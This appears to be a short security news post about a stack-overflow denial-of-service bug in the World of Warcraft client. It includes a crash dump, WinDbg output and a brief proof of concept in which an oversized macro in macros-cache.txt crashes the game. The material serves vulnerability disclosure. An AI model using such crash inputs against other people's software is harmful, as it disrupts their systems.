World of Warcraft vulnerable to dos via macros-cache.txt [Stack Overflow]

The exploit author AliReza Chegini (@Nimaarek) has published a World of Warcraft DOS attack which uses the Macros-Cache.txt file.

World of Warcraft is a Massively multiplayer online game which allows people to take a champion and roam the World of Warcraft world. The game is played by millions of people, and it is still a very attractive target for hackers.

The exploit author has published his findings to the exploit-db community and the 1337day community.

world of warcraft dos attack

The output of the error provided after the Macros-cache DOS vulnerability

Output:
–WoWError [CrashDUmp] :
World of WarCraft (build 12340)
Exe:      D:WowWow.exe
Time:     Jul 21, 2014  6:10:08.243 PM
User:     nimaarek
Computer: NIMAAREK-L
——————————————————————————
This application has encountered a critical error:
ERROR #132 (0x85100084) Fatal Exception
Program:    D:WowWow.exe
Exception:  0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77
–Windbg result:
0:020> g
ModLoad: 6c670000 6c6a0000   C:WindowsSysWOW64wdmaud.drv
ModLoad: 6d3a0000 6d3a4000   C:WindowsSysWOW64ksuser.dll
ModLoad: 6c660000 6c667000   C:WindowsSysWOW64AVRT.dll
ModLoad: 6c610000 6c618000   C:WindowsSysWOW64msacm32.drv
ModLoad: 6c600000 6c607000   C:WindowsSysWOW64midimap.dll
ModLoad: 71e50000 71e66000   C:WindowsSysWOW64CRYPTSP.dll
ModLoad: 71e10000 71e4b000   C:WindowsSysWOW64rsaenh.dll
(3a8.470): Stack overflow – code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Wow.exe –
eax=02af2000 ebx=050c1f6e ecx=00000000 edx=00000000 esi=17b28f50 edi=00000000
eip=0040bb77 esp=032eed00 ebp=032ef92c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Wow+0xbb77:
0040bb77 8500            test    dword ptr [eax],eax  ds:002b:02af2000=00000000
==============================================================================

The World of Warcraft DOS proof of concept by AliReza Chegini

Poc :
%systemroot%WowWTFAccount[AccountName]macros-cache.txt
MACRO 1 “Decursive” INV_Misc_QuestionMark
/stopcasting
/cast [target=mouseover,nomod,exists] Dispel Magic;  [target=mouseover,exists,mod:ctrl] Abolish Disease; [target=mouseover,exists,mod:shift] Dispel Magic
END
MACRO 2 “PoC” INV_Misc_QuestionMark
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA x n+1 🙂
END
==============================================================================
Greetz to My Friend : promoh3nv , AmirHosein Nemati , b3hz4d And Head Administrator of ST-Team [RadoN]